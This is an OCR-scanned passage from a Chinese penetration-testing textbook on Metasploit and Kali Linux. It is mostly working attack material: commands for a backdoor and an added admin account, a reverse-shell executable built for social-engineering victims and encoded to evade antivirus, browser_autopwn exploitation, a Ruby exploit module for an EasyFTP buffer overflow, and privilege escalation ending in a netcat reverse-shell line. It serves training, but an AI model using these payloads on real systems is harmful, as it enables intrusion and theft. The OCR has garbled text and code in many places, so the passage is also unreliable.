关闭 当前 的 meterpreter 会 话 。 在 需要 控制 被 测 主机 的 时 候 ， 我 们 可 以 调 
用 multi/handler 中 的 windows/metsvc_bind_tcp payload， 通 过 后 门 控制 远 
程 主 机 。 

meterpreter > exit 

[*] Meterpreter session 1 closed. Reason: User exit 

msf exploit(ms08_067_netapi) > back 

msf > use exploit/multi/handler 

msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp 

PAYLOAD => windows/metsvc_bind_tcp 

msf exploit(handler) > set LPORT 31337 

LPORT => 31337 

msf exploit(handler) > set RHOST 192.168.0.7 

RHOST => 192.168.0.7 

msf exploit(handler) > exploit 

[*] Starting the payload handler... 

[*] Started bind handler 

[*] Meterpreter session 2 opened (192.168.0.3:37251 -> 

192.168.0.7:31337) at Tue Nov 16 20:02:05 +0000 2010 

meterpreter > getuid 

Server username: NT AUTHORITY\SYSTEM 

此 外 ，Meterpreter 的 getgui 脚本 也 很 有 用 ， 它 可 开启 目标 主机 的 远 
程 果 面 功能 。 如 雷 在 目标 主机 上 创建 新 的 账号 ， 并 强制 启用 远程 果 面 服 
务 ， 可 使 用 下 述 指令 。 


meterpreter > run getgui -u btuser -p btpass 





[*] Windows Remote Desktop Configuration Meterpreter Script by 
Darkoperator 


[*] Carlos Perez carlos_perez@darkoperator.com 


[*] Language set by user to: 'en_EN' 

[*] Setting user account for logon 

[*] Adding User: btuser with Password: btpass 

[*] Adding User: btuser to local group 'Remote Desktop Users' 

[*] Adding User: btuser to local group 'Administrators' 

[*] You can now login with the created user 

[*] For cleanup use command: run multi_console_command -rc 

/root/.msf3/logs/scripts/getgui/clean up  20101116.3447.rc 

现在 ， 我 们 可 通过 rdesktop 程序 登录 目标 主机 。 我 们 新 建 一 个 终端 
窗口 ， 并 在 其 中 输入 下 述 指令 。 

# rdesktop 192.168.0.7:3389 

请 注意 : 如 果 已 经 破解 了 目标 主机 的 账户 名 和 密码 ， 就 不 需要 新 建 
任何 账号 ， 直 接 执 行 run getgui -e moO Hite Reta. 5. 
在 完成 渗透 工作 以 后 ， 记 得 要 在 Meterpreter shell 里 使 用 getgui/clean_up 
脚本 程序 ， 以 清理 痕迹 。 

如 果 目 标 网 络 不 可 从 外 部 直接 访问 ， 那 么 应 该 采取 那些 手段 进一步 
渗透 该 网 络 呢 ? 

Metasploit 能 够 通过 跳板 进行 操作 。 您 可 通过 
routeaddtargetSubnettargetSubnetMask SessionId 的 指令 ， 将 某 个 会 话 指 
定 为 跳板 。 此 处 SessionId 指 代 已 经 建立 的 Meterpreter 会 话 ( 即 跳板 网 
天 ) ， targetsubnet 参 数 指 代 下 一 步 需 要 测试 的 网 段 (如 果 被 攻陷 的 主机 
是 双 网 设备 ， 则 可 以 是 它 的 另 一 个 网 段 }) 。Metasploit 会 通过 跳板 转发 

旨 定 的 网 络 流量 ， 这 样 束 可 以 继续 渗透 、 测 试 那 些 无 法 直接 访问 到 的 网 
络 设备 。 转 发 流量 的 主机 ， 融 是 通 冲 所 说 的 “跳板 ?或 “立足 点 ”。 

场景 4 

上 述 案 例 演示 了 Metasploit 框 架 利用 被 测 主 机 的 远程 漏洞 的 具体 方 
法 。 那 么 如 何 利用 客户 端 程序 的 漏洞 〈client-side exploitation) We? Wilk 




















问题 ， 本 文 将 以 渗透 测试 人 员 的 角度 ， 通 过 典型 案例 介绍 Metasploit 在 
利用 客户 问 程 序 的 漏洞 方面 的 角色 ， 帮 助 读 者 了 解 它 的 灵活 性 和 强大 功 
能 。 

生成 后 门 程 序 

Metasploit 的 msfpayload 工具 能 够 生成 可 单独 运行 的 、 执 行 指定 
Metasploit payload 的 后 门 程 序 。 如 果 只 能 采取 社会 工程 学 手段 对 目标 进 
行 渗 透 ， 那 么 这 种 手段 就 真是 救命 稻草 了 。 在 本 例 中 ， 我 们 将 生成 一 个 
带 有 reverse shell payload 的 可 执行 文件 ， 然 后 把 它 发 给 目标 人 物 ， 诱 使 
他 /她 执行 这 个 文件 。msfpayload 程 序 可 以 生成 多 种 语言 的 程序 ， 输 出 
Perl、C、Raw、Ruby、JavaScript、Exe、DLL 和 VBA 等 格式 的 文件 。 

如 需 启动 msfpayload 工 具 ， 可 在 您 的 shell 中 执行 下 述 指 令 。 

# msfpayload -h 

上 述 指令 将 会 显示 它 的 使 用 说 明 ， 并 列 出 所 有 可 用 的 payload。 它 的 
指令 格式 和 MSFCLI 非 常 相似 。 现 在 ， 我 们 通过 下 述 指令 创建 一 个 带 有 
reverse shell payload 的 可 执行 程序 。 

# msfpayload windows/shell reverse tcp LHOST=192.168.0.3 
LPORT=33333 O 


# msfpayload windows/shell reverse tcp LHOST=192.168.0.3 
LPORT=33333 X 

>/tmp/poker.exe 

Created by msfpayload (http://www.metasploit.com). 

Payload: windows/shell_reverse_tcp 

Length: 314 

Options: LHOST=192.168.0.3, LPORT=33333 

这 样 ， 我 们 就 生成 了 目 己 的 后 门 程序 。 在 把 它 发 送 到 受害 人 或 目标 
之 前 ， 您 必须 在 MSFConsle 里 使 用 multi/handler 做 好 服务 端的 准备 ， 以 便 





它 可 受理 可 执行 文件 连 入 本 机 的 请 求 。 这 时 候 ， 要 使 nultihandler 的 配 
置 和 msfpayload 在 创建 程序 时 的 配置 相 匹 配 。 
msf > use exploit/multi/handler 
msf exploit(handler) > set PAYLOAD windows/shell_reverse_tcp 
PAYLOAD => windows/shell_reverse_tcp 


msf exploit(handler) > show options 


msf exploit(handler) > set LHOST 192.168.0.3 

LHOST => 192.168.0.3 

msf exploit(handler) > set LPORT 33333 

LPORT => 33333 

msf exploit(handler) > exploit 

[*] Started reverse handler on 192.168.0.3:33333 

[*] Starting the payload handler... 

现在 ， 我 们 可 以 把 准备 好 的 Windows 可 执行 文件 通过 社会 工程 欺骗 
方法 发 送 给 目标 机 器 ， 然 后 等 竺 对 方 运行 。 

[*] Command shell session 2 opened (192.168.0.3:33333 -> 

192.168.0.7:1053) at Wed Nov 17 04:39:23 +0000 2010 

Microsoft Windows XP [Version 5.1.2600] 

(C) Copyright 1985-2001 Microsoft Corp. 

C:\Documents and Settings\salesdept\Desktop> 

如 果 在 “MSFConsole 里 看 见 了 上 述 信 息 ， 就 表明 目标 主机 发 起 了 
reverse ”shell， 我 们 成 功 地 连接 到 了 人 被 测 主机 的 shell， 圆 满 地 完成 了 任 
务 。 

Metasploit 生 成 的 文件 能 否 规避 杀毒 软件 的 检测 ? 

有 很 多 种 方法 可 以 规避 杀毒 软件 的 检测 ， 本 文 只 介绍 其 中 的 一 种 。 
我 们 可 使 用 /usr/bin/msfencode 目 录 下 的 msfencode 工 具 ， 对 可 执行 文件 进 








行 保 护 性 封装 。 在 使 用 msfpayload 程序 生成 可 执行 文件 时 ， 使 用 管道 命 
令 把 文件 内 容 传 给 msfencode 再 生成 最 终 文 件 。 例 如 ， 下 述 指令 将 生成 
带 有 reverse shell 的 可 执行 文件 ， 并 对 文件 进行 保护 性 封装: msfpayload 
windows/ shell/reverse tcp LHOST=192.168.0.3 LPORT-32323 R | 
msfencode -e x86/shikata ga nai -t exe >/tmp/tictoe。 在 规避 检测 方面 ， 
staged payload 的 成 功率 大 于 inlinepayload。 

自动 化 浏览 器 漏洞 利用 

在 测试 较为 安全 的 企业 网 络 时 ， 渗 透 人 员 往 往 不 知 从 何 处 入 手 。 在 
这 种 情况 下 ， 以 使 用 电子 设备 的 人 员 为 目标 ， 或 以 员工 为 首要 目标 开展 
社会 工程 学 攻击 可 能 是 唯一 的 方向 。 本 例 将 使 用 Metasploit 框架 的 客户 
站 漏洞 利用 模板 ， 以 省 示 基 于 技术 手段 的 社会 工程 学 攻击 。 下 面 将 介绍 
一 球 先 进 的 辅助 工具 一 一 Browser autopwn。 在 目标 人 员 访 问 它 构建 的 恶 
意 URL “的 情况 下 ， 它 能 够 识别 出 被 测 主机 的 浏览 器 类 型 ， 并 根据 识别 
结果 自动 从 框架 中 选用 针对 该 浏览 器 的 exploit 程 序 对 浏览 器 发 起 攻击 。 
有 关 的 指令 及 运行 结果 如 下 。 


msf > use auxiliary/server/browser_autopwn 





msf auxiliary(browser_autopwn) > show options 


msf auxiliary(browser_autopwn) > set LHOST 192.168.0.3 
LHOST => 192.168.0.3 

msf auxiliary(browser_autopwn) > set SRVPORT 80 
SRVPORT => 80 

msf auxiliary(browser_autopwn) > set SRVHOST 192.168.0.3 
SRVHOST => 192.168.0.3 

msf auxiliary(browser_autopwn) > set URIPATH / 

URIPATH => / 


msf auxiliary(browser_autopwn) > run 


[*] Auxiliary module execution completed 

[*] Starting exploit modules on host 192.168.0.3... 

[ls 

[*] Starting exploit multi/browser/firefox escape retval with payload 
generic/ shell reverse tcp 

[*] Using URL: http://192.168.0.3:80/Eem9cKUIFvW 

[*] Server started. 

[*] Starting exploit multi/browser/java calendar deserialize with 
payload java/meterpreter/reverse tcp 

[*] Using URL: http://192.168.0.3:80/s98jmOiOtmv4 

[*] Server started. 

[*] Starting exploit multi/browser/java_trusted_chain with payload java/ 
meterpreter/reverse_tcp 

[*] Using URL: http://192.168.0.3:80/6BkY9uM23b 

[*] Server started. 

[*] Starting exploit multi/browser/mozilla compareto with payload 
generic/shell_reverse_tcp 

[*] Using URL: http://192.168.0.3:80/UZOI7Y 

[*] Server started. 

[*] Starting exploit multi/browser/mozilla navigatorjava with payload 
generic/ shell_reverse_tcp 

[*] Using URL: http://192.168.0.3:80/jRwIT67KIK6gJE 


[*] Starting exploit windows/browser/ie_createobject with payload 
windows/meterpreter/reverse_tcp 
[*] Using URL: http://192.168.0.3:80/Xb9Cop7VadNu 


[*] Server started. 


[*] Starting exploit windows/browser/ms03 020 ie objecttype with 
payload windows/meterpreter/reverse tcp 
[*] Using URL: http://192.168.0.3:80/rkd0X4Xb 


[*] Server started. 


[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333 

[*] Starting handler for generic/shell_reverse_tcp on port 6666 

[*] Started reverse handler on 192.168.0.3:3333 

[*] Starting the payload handler... 

[*] Starting handler for java/meterpreter/reverse_tcp on port 7777 

[*] Started reverse handler on 192.168.0.3:6666 

[*] Starting the payload handler... 

[*] Started reverse handler on 192.168.0.3:7777 

[*] Starting the payload handler... 

[*] --- Done, found 15 exploit modules 

[*] Using URL: http://192.168.0.3:80/ 

[*] Server started. 

一 旦 目标 人 员 访 问 了 恶意 URL Chttp://192.168.0.3) ， 程 序 将 会 识别 
出 他 的 /她 的 浏览 妖 ， 并 执行 相应 的 漏洞 利用 程序 。 在 此 以 后 ， 我 们 就 
可 以 通过 客户 端 利用 程序 渗透 目标 主机 。 

[*] Request '/ from 192.168.0.7:1046 

[*] Request '/ from 192.168.0.7:1046 

[1 Request y? 
sessid- V2luZG93czpY UDpTUDI6ZWAtdXM6eDg2Ok1TSUUGNi4wO1NQ] 
%3d' from 192.168.0.7:1046 

[*] JavaScript Report: Windows: XP:SP2:en-us:x86: MSIE:6.0; SP2: 

[*] Responding with exploits 


[*] Handling request from 192.168.0.7:1060... 

[*] Payload will be a Java reverse shell to 192.168.0.3:7777 from 
192.168.0.7... 

[*] Generated jar to drop (4447 bytes). 

[*] Handling request from 192.168.0.7:1061... 


[*] Sending Internet Explorer COM CreateObject Code Execution 
exploit HTML to 192.168.0.7:1068... 

[*] Request '/ from 192.168.0.7:1069 

[*] Request '/ from 192.168.0.7:1068 

[*] Request '/ from 192.168.0.7:1069 

[*] Sending EXE payload to 192.168.0.7:1068... 

[*] Sending stage (749056 bytes) to 192.168.0.7 

[*]  Meterpreter session 1 opened  (192.168.0.3:3333  - 
>192.168.0.7:1072) at Thu Nov 18 02:24:00 +0000 2010 

[*] Session ID 1 (192.168.0.3:3333 -> 192.168.0.7:1072) processing 
InitialAutoRunScript ‘migrate -f' 

[*| Current server process: hzWWoLvjDsKujSAsBVykMTiupUh.exe 
(4052) 

[*] Spawning a notepad.exe host process... 

[*] Migrating into process ID 2788 


[*] New server process: notepad.exe (2788) 


msf auxiliary(browser_autopwn) > sessions 


Active sessions 


Id Type Information 


Connection 


1 meterpreter x86/win32 CUSTDESK\Momin Desktop @ 
CUSTDESK 

(ADMIN) 192.168.0.3:3333 -> 192.168.0.7:1072 

msf auxiliary(browser_autopwn) > sessions -i 1 

[*] Starting interaction with 1... 

meterpreter > getuid 

Server username: CUSTDESK\Momin Desktop 

上 述 信 息 表明 ， 我 们 已 经 利用 客户 端的 攻击 程序 成 功 渗透 到 目标 主 
机 。 应 当 指出 的 是 ， 这 些 Web 浏 览 器 的 exploit 程 序 ， 每 个 都 只 能 对 特定 
版 本 的 特定 浏览 器 (例如 Intenet Explorer, Firefox. Operas) 进行 攻 
t 





Metasploit 框架 最 引 人 注 目 之 处 在 于 它 可 以 独立 开发 exploit 程序 。 
本 节 将 围绕 exploit 开 发 的 核心 问题 进行 讨论 ， 通 过 生动 的 例子 演示 使 用 
Metasploit 框架 的 数据 库 构 造 exploit 的 关键 步骤 。 然 而， 在 使 用 这 个 框 
架 编写 自己 的 exploit 程序 之 前 ， 您 需要 理解 一 些 _ Ruby 编程 的 基础 知 
识 。 另 外 ， 您 还 需要 掌握 逆 回 工程 的 基本 技能 ， 并 切实 理解 漏洞 挖掘 工 
H Cülfuzzersflldebuggers) 的 使 用 方法 。 只 有 兼备 上 述 技能 ， 您 才能 按 
步 就 班 地 构造 exploit 程 序 。 本 节 的 内 容 仅 作为 有 关 研发 的 简略 介绍 ， 在 
完整 程度 上 可 能 存在 欠缺 。 

本 例 将 针对 EasyFTP Server (1.7.0.11 以 下 版 本 ) 编写 利用 MKD 
Command Stack Buffer Overflow 漏洞 的 shellcode 程序 ， 它 能 够 反映 编写 
缓冲 区 溢出 exploit 的 大 致 方法 。 您 可 以 针对 其 他 FTP 服 务 端 程序 的 相似 
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漏洞 ， 举 一 反 三 地 编写 exploit 程 序 。 这 个 exploit 的 源 代 码 的 下 载 网 址 
是 /usr/share/metasploit- 
framework/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb. 

HH 

# $Id: easyftp_mkd_fixret.rb 9935 2010-07-27 02:25:15Z jduck $ 

HH 

文件 中 的 header 部 分 描述 了 这 个 exploit 的 文件 名 、 修 订 编 号 、 创 建 
日 期 和 时 间 。 

HH 

# This file is part of the Metasploit Framework and may be subject to 

# redistribution and commercial restrictions. Please see the Metasploit 

# Framework web site for more information on licensing and terms of 
use. 

# http://metasploit.com/framework/ 

HH 

require 'msf/core' 

在 exploit 的 开头 部 分 ， 首 先 要 对 MSF 核心 库 进 行 初 始 化 。 

class Metasploit3 < Msf::Exploit::Remote 

上 述 代码 所 用 的 Exploit 子 类 定义 了 远程 TCP 连 接 所 需 的 各 种 选项 和 
方法 (内 置 函数 ) , RHOST, RPORT. Connect(). Disconnect(). 
SSLOSS. 

Rank = GreatRanking 

上 述 代码 根据 需求 和 使 用 的 频率 分 配 等 级 。 

include Msf::Exploit::Remote::Ftp 

上 述 代码 中 的 Ftp 子 类 用 于 和 FTP 服 务 端 建立 连接 。 

def initialize(info = {}) 


super(update_info(info, 


'Name' => 'EasyFIP Server <= 1.7.0.11 MKD Command 
Stack Buffer Overflow', 
'Description' => %q{ 
This module exploits a stack-based buffer overflow in 
EasyFTP Server 1.7.0.11 
and earlier. EasyFTP fails to check input size when parsing 
'MKD' commands, which 
leads to a stack based buffer overflow. 
NOTE: EasyFTP allows anonymous access by default. However, 
in order to access the 
'MKD' command, you must have access to an account that can 
create directories. 
After version 1.7.0.12, this package was renamed "UplusFtp". 
This exploit utilizes a small piece of code that I've referred to as 
fixRet'. 
This code allows us to inject of payload of —500 bytes into a 
264 byte buffer by 
fixing' the return address post-exploitation. See references for 
more information. 
Js 
‘Author’ ==> 
[ 
'x90c', # original version 
‘jduck', # port to metasploit / modified to use fix-up stub 
(works with bigger payloads) 
]， 
License => MSF LICENSE, 


'Version' => '$Revision: 9935 $', 
' References' => 
[ 
['OSVDB', '62134' ], 
['URL',, 'http://www.exploit-db.com/exploits/12044/ ], 
[URL’, 'http://www.exploit-db.com/exploits/14399/ | 
]， 
上 述 代码 描述 了 exploit 的 常规 信息 ， 并 且 明 确 了 参考 的 资料 。 
'DefaultOptions' => 
{ 
'EXITFUNC' => 'thread' 
上 述 代码 指定 了 exploit 在 结束 时 的 销毁 方式 。 
‘Privileged’ => false, 
‘Payload’ => 
{ 
‘Space’ => 512, 
'BadChars' => "\x00\xOa\x0d\x2f\x5c", 
'DisableNops' => true 
h 
上 述 代码 为 shellcode 预 留 了 512 字 市 空间 ， 列 出 应 终止 paylod 的 坏 字 
符 ， 并 禁止 使 用 NOP 填 充 payload。 
Platform => 'win', 
"Iargets' => 
[ 
[ Windows Universal - v1.7.0.2', { 'Ret' => 
0x004041ec } ], # call ebp - from ftpbasicsvr.exe 


[ Windows Universal - v1.7.0.3', { 'Ret' => 
0x004041ec } J, # call ebp - from ftpbasicsvr.exe 
[ Windows Universal - v1.7.0.4', { 'Ret' => 
0x004041dc } J, # call ebp - from ftpbasicsvr.exe 
[ Windows Universal - v1.7.0.5', { 'Ret' => 
0x004041a1 } J, # call ebp - from ftpbasicsvr.exe 
[ Windows Universal - v1.7.0.6', { 'Ret' => 
0x004041a1 } J, # call ebp - from ftpbasicsvr.exe 
[ Windows Universal - v1.7.0.7', { 'Ret' => 
0x004041a1 } J, # call ebp - from ftpbasicsvr.exe 
[ Windows Universal - v1.7.0.8', { 'Ret' => 
0x00404481 } |, # call ebp - from ftpbasicsvr.exe 
[ Windows Universal - v1.7.0.9', { 'Ret' => 
0x00404441 } |], # call ebp - from ftpbasicsvr.exe 
[ Windows Universal - v1.7.0.10', { 'Ret' => 
0x00404411 } ], # call ebp - from ftpbasicsvr.exe 
[ Windows Universal - v1.7.0.11', { 'Ret' => 
0x00404411 } J, # call ebp - from ftpbasicsvr.exe 
]; 
'DisclosureDate' => 'Apr 04 2010', 
'DefaultTarget' => 0)) 
上 述 代码 定义 了 操作 系统 的 平台 类 型 ， 定 义 了 Easy 
FTPServer (1.7.0.2~1.7.0.11) 的 10 个 〈 序 号 0 一 9) 有 缺陷 的 版 本 ;， TR 
据 版 本 的 不 同 ， 又 定义 了 可 执行 程序 Ctpbasicsvr. exe) 不 同 的 返回 地 
址 。 男 外 ， 它 声明 了 exploit 的 发 布 日 期 ， 以 及 攻击 目标 的 默认 版 本 号 
C1702) 6 


end 





def check 
Connect 
disconnect 
if (banner =~ /BigFoolCat/) 
return Exploit::CheckCode:: Vulnerable 
end 
return Exploit::CheckCode::Safe 
end 
EX (RES A check() Eg 25 FH FFU ET H bs EWE a EE TA o 
def make_nops(num); "C" * num; end 
上 述 代码 定义 的 宏 函 数 可 生成 num 个 NOP， 主 要 用 于 规避 
IDS/IPS/AV 检 测 。 昌 然 这 个 程序 确实 使 用 NOP 作 为 规避 检测 的 手段 ， 但 
是 通常 情况 下 这 种 方式 并 不 会 奏效 。 所 以 ， 除 非 有 特别 好 的 理由 ， 否 则 
不 要 使 用 这 种 技术 。 简 单 起 见 ， 在 写 exploit 模 板 的 时 候 保 留 了 这 段 代 
AY 
def exploit 








connect_login 
# NOTE: 


# This exploit jumps to ebp, which happens to point at a partial 
version of 


# the buf string in memory. The fixRet below fixes up the code 
stored on the 

# stack and then jumps there to execute the payload. The value in esp 
is used 

# with an offset for the fixup. 

fixRet_asm = %q{ 


mov edi,esp 


sub edi, Oxfffffe10 

mov [edi], Oxfeedfed5 

add edi, Oxffffff14 

jmp edi 

} 
fixRet = Metasm::Shellcode.assemble(Metasm::1a32.new, 
fixRet_asm).encode_string 
buf =" 
上 述 代码 将 返回 地 址 调整 为 payload 的 启 始 地 址 。 从 技术 上 来 说 ， 
它 解 决 了 堆栈 寻 址 (stack addressing) 的 问题 。 

print_status("Prepending fixRet...") 
buf << fixRet 
buf << make_nops(0x20 - buf.length) 
exploit 绥 冲 区 的 开头 部 分 是 经 编码 处 理 过 的 返回 地 址 和 随机 个 NOP 


print_status("Adding the payload...") 

buf << payload.encoded 

上 述 代 码 将 在 程序 运行 期 间 把 shellcode 动 态 地 添加 到 exploit 中 。 

# Patch the original stack data into the fixer stub 

buf[10, 4] = buf[268, 4] 

print_status("Overwriting part of the payload with target 

address...") 

buf[268,4] = [target.ret].pack( V") # put return address 

@ 268 bytes 

调整 栈 里 的 数据 ， 修 改 返 回 地 址 为 shellcode 的 地 址 。 这 样 利 用 栈 的 
特性 ， 程 序 在 执行 过 程 中 将 自动 跳 转 到 shell 的 地 址 。 

print_status("Sending exploit buffer...") 











send cmd( [MKD', buf] , false) 
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过 FTP 号 份 验证 之 后 才能 使 用 的 指令 ) ， 把 构造 好 的 缓冲 区 数据 发 送 给 
指定 主机 。 精 心 构造 的 buf 数 据 可 以 通过 Easy-FTP 服务 端 程序 的 MKD 
命令 触发 基于 栈 结 构 的 缓冲 区 溢出 漏洞 ， 继 而 执行 我 们 的 payload， 完 成 
对 目标 系统 的 漏洞 利用 。 之 后 ， 我 们 还 要 通过 下 述 代码 关闭 FTP 连 接 。 
handler 


disconnect 





end 
end 
Metasploit 搭 载 了 许多 实用 工具 。Win32 下 的 msfpescan 程 序 和 Linux 
下 的 msfelfscan， 都 可 用 于 但 找 指定 程序 的 返回 地 址 。 例 如 ， 要 查找 指 
定 程序 的 返回 地 址 ， 可 使 用 指令 : #./msfpescan -p targetapp.ext。 


9.4 本 音 总 结 





本 章 介 绍 了 利用 目标 漏洞 的 几 个 关键 点 。 开 篇 首先 展示 了 漏洞 检 训 
的 全 过 程 ， 并 强调 了 有 关 工 作 所 需 的 知识 和 技巧 。 功 能 强大 的 Kali 
Linux 是 漏洞 评估 工作 的 利器 。 本 章 接 下 来 列举 出 了 发 布 各 种 已 公布 漏 
洞 和 exploit 程 序 的 网 站 。 本 章 的 最 后 篇 幅 演 示 了 高 级 源 洞 利用 工具 集 
Metasploit 框 架 。 文 中 借助 大 量 实例 ， 介 绍 了 通过 各 种 利用 漏洞 获 
取 被 测 目 标 控制 权 的 方法 。 此 外 ， 本 文 还 深入 浅 出 地 介绍 了 编写 漏洞 利 
用 代码 的 各 个 环节 ， 阅 述 了 exploit 程 序 的 基本 框架 和 编写 策略 。 

下 一 章 将 会 介绍 提升 权限 的 各 种 工具 和 技术 。 











上 一 章 介 绍 了 利用 已 识别 的 漏洞 进行 漏洞 映射 的 有 关 流 程 。 利 用 漏 
洞 的 最 终 目的 是 获取 被 测 系 统 的 最 高 权限 ， 即 Windows 操 作 系统 中 管理 
员 账 户 的 权限 ， 或 UNIX 操 作 系统 中 root 账 户 的 权限 。 

所 以 在 利用 漏洞 之 后 束 应 当 提 升 权 限 。 提 升 权限 的 实质 是 通过 利用 
漏洞 的 手段 提高 自身 的 操作 权限 。 

提升 权限 的 方式 分 为 两 类 。 

e 纵 癌 提 权 (vertical privilege escalation) : 如 果 低 权限 角色 的 用 
户 ) 能 够 获得 高 权限 角色 的 权限 ， 则 这 种 提 权 就 可 称 为 纵 回 提 权 。 例 
如 ， 如 果 在 提 权 之 后 ， 内 容 管理 系统 CMS) 的 某 个 用 户 能 够 使 用 管理 
员 的 功能 ， 那 么 这 种 提 权 就 是 纵 问 提 权 。 

e 横向 提 权 (horizontal privilege escalation) : 如 果 获 取 了 同 级 别 角 
色 的 权限 ， 这 种 提 权 就 属于 横向 提 权 。 例 如 ， 如 果 在 网 上 银行 里 ， 用 户 
A 获取 了 用 户 B 的 权限 ， 他 可 以 蔡 用 户 B 进 行 操作 ， 那 么 这 种 提 权 残 属 
于 横 回 提 权 。 

越权 提升 权限 的 攻击 矢量 ， 大 体 可 分 为 以 下 几 种 。 

e 利用 本 地 漏洞 。 

e 利用 目标 系统 上 的 配置 缺陷 。 人 例如， 如果 home 目录 可 被 其 他 用 
户 访 问 ， 那 么 攻击 人 员 可 就 可 以 使 用 目录 里 的 SSH 私 有 密 钥 访问 其 他 主 
Hle 

e 利用 目标 系统 的 弱 密 码 。 

e 咽 探 网 络 流量 以 捕获 他 人 的 用 户 名 和 密码 。 

e 伪造 网 络 数据 包 。 

本 章 不 会 讨论 利用 配置 缺陷 的 渗透 方法 。 

















这 一 人 小节， 我 们 将 使 用 本 地 漏洞 的 利用 程序 Clocal exploit) 提升 权 
限 。 

我 们 的 演示 环境 如 下 。 

e IP 为 192.168.56.102， 运 行 Metasploitable 2 的 虚拟 机 充当 被 测 主 
机 。 

e IP 为 192.168.56.101， 运 行 Kali Linux 的 虚拟 机 充当 测试 平台 。 

首先 ， 我 们 要 扫描 被 测 主机 上 的 网 络 服务 。 本 文通 过 下 述 指令 进行 
端口 扫描 。 

nmap —p- 192.168.56.102 

我 们 通过 -p- 选 项 ， 令 Nmap 扫 摘 被 测 主机 的 所 有 端口 〈1 一 
65535) 。 

在 扫描 结束 之 后 ，Nmap 会 列 出 所 有 开放 的 端口 〈《 见 图 10.1) 。 


ost is up (0.0098s latency). 
ot shown: 65505 closed ports 
STATE SERVICE 
open ftp 
open ssh 
open telnet 
open smtp 
open domain 
open http 
open rpcbind 
open netbios-ssn 
open microsoft-ds 
open exec 
open login 
open shell 
open rmiregistry 
open ingreslock 
open nfs 
open ccproxy-ftp 
l 


BOSE tcp open distccd 


5900/tcp open vnc 
图 10.1 
我 们 通过 网 上 资料 确定 distccd 服 务 存在 漏洞 ， 可 被 用 来 执行 任意 指 
。 这 个 服务 是 一 种 分 布 式 的 编译 工具 ， 可 协调 多 人 台 主 机 协助 完成 大 规 
BRES. 
然后 ， 我 们 要 确定 Metasploit 中 是 否 有 相应 的 exploit 程 序 〈 见 图 
10.2) 。 
上 述 信息 表明 ，Metasploit 确 有 攻击 distccd 服 务 漏洞 的 exploit 程 序 。 
接 下 来 ， 我 们 通过 下 述 指令 利用 这 个 漏洞 〈 见 图 10.3) 。 














msf> Search distccd 


Matching Modules 


Name Disclosure Date Rank Description 


exploit/unix/misc/distcc exec 2002-02-01 00:00:00 UTC excellent DistCC Daemon 
Command Execution 





图 10.2 
msf> use exploit/unix/misc/distcc exec 
msf exploit(distcc exec) » set RHOST 192.168.56.102 
RHOST => 192.168.56.102 
msf exploit(distcc exec) » exploit 


] Started reverse double handler 
] Accepted the first client connection... 
] Accepted the second client connection... 
] Command: echo AA3PfhlQvFR969Be; 
] Writing to socket A 

] Writing to socket B 

] Reading from sockets... 
] Reading from socket B 

] B: “AA3P fh LQvFR969Be\ r\n" 

] Matching... 

] A is input... 

] Command shell session 2 opened (192.168.56.101:4444 -» 192.168.56.102:60018) at 
0 


whoami 
daemon 





110.3 

我 们 通过 这 个 exploit 利 用 了 该 服务 的 漏洞 。 而 后 ， 我 们 通过 操作 系 
统 的 指令 看 到 已 经 获取 到 的 权限 是 daemon 的 权限 。 

在 进一步 操作 之 前 ， 我 们 应 到 获取 被 测 主机 的 详细 信息 。 现 在 ， 我 
们 通过 下 述 指令 查看 被 测 主 机 的 内 核 版 本 。 

uname —r 

通过 上 述 指令 ， 我 们 了 解 到 目标 主机 的 内 核 是 2.6.24-16-server。 

我 们 搜索 ” exploit-db ”的 资料 库 ， 发 现 某 个 exploit ”程序 

(http:/www.exploitdb.com/exploits/8572/)〉 可 将 我 们 的 权限 提升 为 root 权 

限 。 下 一 步 ， 我 们 在 测试 主机 上 保存 exploit 程 序 ， 然 后 使 被 测 主机 从 测 
试 主机 下 载 这 个 程序 。 有 关 指 令 如 图 10.4 所 示 。 





在 被 测 主机 上 下 载 exploit 之 后 ， 我 们 在 被 测 主 机 上 使 用 gcc 指 令 编译 
exploit。 

gcc privs.c -o privs 

现在 ， 我 们 制备 好 了 exploit 程 序 。 在 分 析 了 exploit 的 源 代码 之 后 ， 
我 们 发 现 这 个 exploit 程 序 需 要 在 命令 行 里 使 用 udevd netlink socket 的 
PID (Process Identifier) 作为 参数 。 为 此 ， 我 们 使 用 下 述 指令 获取 这 个 


PID 值 。 





et http://192.168.56.101/privs.c 
--22:21:27-- 


Length: 2,768 (2.7K) [text/x-csrc] 


BK. os 


22:21:27 (1.26 MB/s) - 





"privs.c' 


awaiting response... 


-0 privs.c 

http://192.168.56.101/privs.c 
=> ‘privs.c' 

Connecting to 192.168.56.101:80... 

HTTP request sent, 


connected. 


200 OK 


saved [2768/2768] 


100% 


1.26 MB/s 








图 10.4 

cat /proc/net/netlink 

所 获 信 息 如 图 10.5 所 示 。 
cat /proc/net/netlink 
Sk Eth Pid Groups Rmem Wmem Dump Locks 
de30a800 0 0 00000000 0 0 00000000 2 
df91d400 4 0 00000000 0 0 00000000 2 
dd884800 7 0 00000000 0 0 00000000 2 
ddcO8600 9 0 00000000 0 0 00000000 2 
ddc04400 10 0 00000000 0 0 00000000 2 
de30ac00 15 0 00000000 0 0 00000000 2 
df86fa00 15 2390 00000001 0 0 00000000 2 
de317800 16 0 00000000 0 0 00000000 2 
df99e400 18 0 00000000 0 0 00000000 2 








图 10.5 


您 也 可 以 通 


过 单条 指令 获取 udev 服 务 的 PID 。 


ps aux | grep udev 


上 述 指令 的 输出 结果 如 下 。 


root 2391 0.0 0.1 2216 660 ? S <S 21:06 0:01 / sbin /udevd -daemon 

即 ，udev 服 务 的 PID 是 2390。 

在 实际 的 渗透 测试 工作 之 中 ， 您 可 能 要 安装 一 台 内 核 与 被 测 主机 完 
全 相同 的 测试 主机 ， mee j 

从 被 测 主机 上 收集 的 信息 判断 ， 目 标 主 机 上 安装 有 NetCat 程 序 。 成 
功 运行 exploit 程 序 之 后 ， 我 们 束 有 了 被 测 主机 的 root na ban 
测 主机 上 运行 netcat 程序 ， 让 和 它 反 向 连接 到 测试 主机 。 其 源 代 码 可 
知 ， 这 个 exploit 把 文件 名 为 run 的 可 执行 文件 当 作 其 Nel 所 以 ， 
我 们 需要 制备 这 个 payload。 
echo '#!/bin/bash' > run 

echo "/bin/netcat -e /bin/bash 192.168.56.101 31337' >> run 

